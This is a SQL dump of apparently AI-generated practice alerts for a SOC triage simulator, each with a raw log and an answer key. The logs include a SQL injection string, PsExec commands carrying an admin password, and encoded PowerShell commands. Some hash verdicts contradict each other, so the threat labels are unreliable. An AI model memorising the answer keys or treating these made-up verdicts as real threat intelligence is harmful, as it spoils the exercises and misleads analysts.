'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request payload is a classic SQL injection technique.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH'), (641, 'Unauthorized Access Attempt on Admin Account', 'high', 'Wazuh', 'Multiple failed login attempts were detected on an admin account from a foreign IP address. This might indicate an attempt to gain unauthorized access.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"DC-SERVER\",\"failed_attempts\":30}', '2026-01-10 05:59:33', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts suggests a brute force attack targeting admin credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (642, 'Suspicious Network Connection to Known C2 Server', 'critical', 'Firewall', 'A suspicious outbound network connection was detected from an internal host to a known command and control server.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.99\",\"username\":\"svc_account\",\"hostname\":\"INFECTED-PC\"}', '2026-01-10 18:01:00', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP recognized as a command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is known for C2 activity, confirming the presence of malware on the host.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'), (643, 'False Positive: User Access from Known Location', 'low', 'Splunk', 'A login attempt was flagged as suspicious due to an unexpected geographic location, but further analysis indicates it is a legitimate access from a known user.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.15\",\"username\":\"mike\",\"hostname\":\"VPN-SERVER\"}', '2026-01-10 04:02:31', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate user access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mike\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User verified as legitimate employee with known travel history.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was from a known user and location, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (644, 'Unauthorized Remote Access Tool Detected', 'high', 'EDR', 'An unauthorized remote access tool was detected running on a corporate workstation, indicating potential compromised access.', 'Malware', 'T1219', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"203.0.113.88\",\"username\":\"lisa\",\"hostname\":\"WORK-PC-01\",\"command_line\":\"C:\\\\Program Files\\\\RAT\\\\rat.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 11:34:49', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a remote access trojan\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with malicious remote access activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and associated IP are known indicators of a remote access trojan.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT'), (645, 'Data Exfiltration Attempt via Email', 'critical', 'Email Gateway', 'Sensitive data was detected in an outgoing email, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1020', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.101\",\"username\":\"alice\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"alice@company.com\",\"email_recipient\":\"external@unknown.com\",\"file_attachment\":\"confidential_data.pdf\",\"file_hash\":\"def4567890abcdef1234567890abcdef\"}', '2026-01-11 00:45:12', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"external@unknown.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized external recipient\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash flagged for containing sensitive data\"}}],\"expected_actions\":[\"block_sender\",\"quarantine_email\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email contains sensitive data and was sent to an unrecognized recipient, indicating data exfiltration.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS'), (646, 'False Positive: Legitimate Application Update', 'low', 'EDR', 'A process execution alert was triggered for a legitimate application update process.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.20\",\"username\":\"system\",\"hostname\":\"UPDATE-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-09 22:44:23', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches legitimate application update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as part of legitimate application update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a verified application update, confirming it as a false positive.\"}', 'Beginner', 'EDR', 3, 1, 'TECH'), (647, 'Lateral Movement Detected via PSExec', 'critical', 'SIEM', 'Lateral movement was detected within the network using PSExec from one internal host to another, indicating potential compromise.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"192.168.1.70\",\"username\":\"administrator\",\"hostname\":\"COMPROMISE-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\"}', '2026-01-10 01:41:05', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of potentially compromised host initiating lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec to execute commands remotely indicates malicious lateral movement.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'), (648, 'False Positive: Unusual Login from Expected Location', 'low', 'Firewall', 'An unusual login was flagged due to an unexpected IP, but the user confirmed it was a legitimate access from a known location.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.75\",\"dst_ip\":\"10.0.0.25\",\"username\":\"susan\",\"hostname\":\"CORP-SERVER\"}', '2026-01-09 21:55:34', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address associated with legitimate user access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"susan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User confirmed access from known location\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was verified by the user as legitimate, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (649, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious PowerShell script was executed on the endpoint, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\"}', '2026-01-10 16:38:54', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used in known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is encoded and matches known malicious patterns.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (650, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a malicious link was received by user jsmith, potentially leading to credential theft.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:25:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"\",\"email_sender\":\"no-reply@fakebank.com\",\"url\":\"http://malicious-link.fakebank.com\"}', '2026-01-10 14:31:51', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to phishing site mimicking a banking login page\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembles a legitimate bank\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site mimicking a bank.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE'), (651, 'SQL Injection Attempt on Web Application', 'high', 'Wazuh', 'An attacker attempted a SQL injection attack on the company\'s public web application, trying to access the database.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:13:09Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 04:54:32', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for SQL injection attacks\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection pattern used to bypass login forms.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH'), (652, 'Brute Force Attack on RDP Detected', 'medium', 'Splunk', 'Multiple failed login attempts detected on the RDP service, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":25}', '2026-01-10 09:48:45', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is involved in multiple brute force campaigns, attempting to compromise admin accounts.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (653, 'Malware Execution via Suspicious EXE', 'critical', 'EDR', 'A suspicious executable was detected running on the endpoint, showing signs of malware infection and potential data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"awilliams\",\"hostname\":\"laptop-02\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 11:03:21', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known ransomware variant\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable exhibits behavior typical of ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable hash is linked to ransomware, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (654, 'Lateral Movement Detected via PSExec', 'high', 'SIEM', 'Suspicious lateral movement detected using PSExec from an internal IP, indicating possible unauthorized access.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:50:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"administrator\",\"hostname\":\"server-02\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\"}', '2026-01-11 12:58:57', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP for lateral movement within network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec used in unauthorized lateral movement attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP for unauthorized access attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec was used for lateral movement within the network, indicating potential unauthorized access.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (655, 'Potential Data Exfiltration via FTP', 'high', 'Firewall', 'Unusual FTP traffic was detected, indicating possible unauthorized data transfer to an external IP.', 'Data Exfiltration', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.77\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"domain\":\"ftp.example.com\"}', '2026-01-10 06:59:49', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious FTP traffic\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"ftp.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate FTP domain with no known issues\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is involved in suspicious FTP traffic, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (656, 'DNS Tunneling Activity Detected', 'medium', 'IDS', 'Unusual DNS queries detected, possibly indicating DNS tunneling for data exfiltration or command and control.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:15:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.88\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"suspicious-dns.example.com\"}', '2026-01-10 21:24:29', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-dns.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for DNS tunneling and data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious DNS traffic\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in DNS tunneling activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to this domain are indicative of tunneling activity for data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (657, 'False Positive: Legitimate Software Update', 'low', 'EDR', 'A software update process was flagged as suspicious but verified to be a legitimate update from a trusted source.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T04:22:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"laptop-03\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:52:04', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches a known legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process was flagged due to unusual execution patterns but verified as a legitimate update.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (658, 'False Positive: Unusual Login Time', 'medium', 'SIEM', 'A login event occurred at an unusual time for the user, but investigation revealed it was a legitimate access.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:10:10Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"workstation-04\",\"failed_attempts\":0}', '2026-01-11 03:18:55', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was initially flagged due to the time but was confirmed as legitimate after user verification.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (659, 'False Positive: High Volume Web Traffic', 'low', 'Firewall', 'An alert was triggered for high volume web traffic, which was determined to be legitimate business activity.', 'Web Attack', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:45:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"203.0.113.200\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"business-partner.com\"}', '2026-01-09 15:07:34', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Trusted partner domain with no security issues\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a business unit\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"business-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate business partner domain\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The traffic volume was high due to a scheduled data exchange with a business partner.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (660, 'Suspicious PowerShell Command with Encoded Payload', 'high', 'Splunk', 'A PowerShell script was executed using an encoded command, indicating possible obfuscation tactics.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN12\",\"command_line\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\"}', '2026-01-09 15:31:43', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used for obfuscation by malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a known indicator of malicious activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (661, 'Multiple Failed Login Attempts Detected', 'medium', 'Wazuh', 'A foreign IP address attempted to log in 23 times unsuccessfully, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"username\":\"administrator\",\"hostname\":\"DC01\",\"failed_attempts\":23}', '2026-01-10 14:02:12', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force 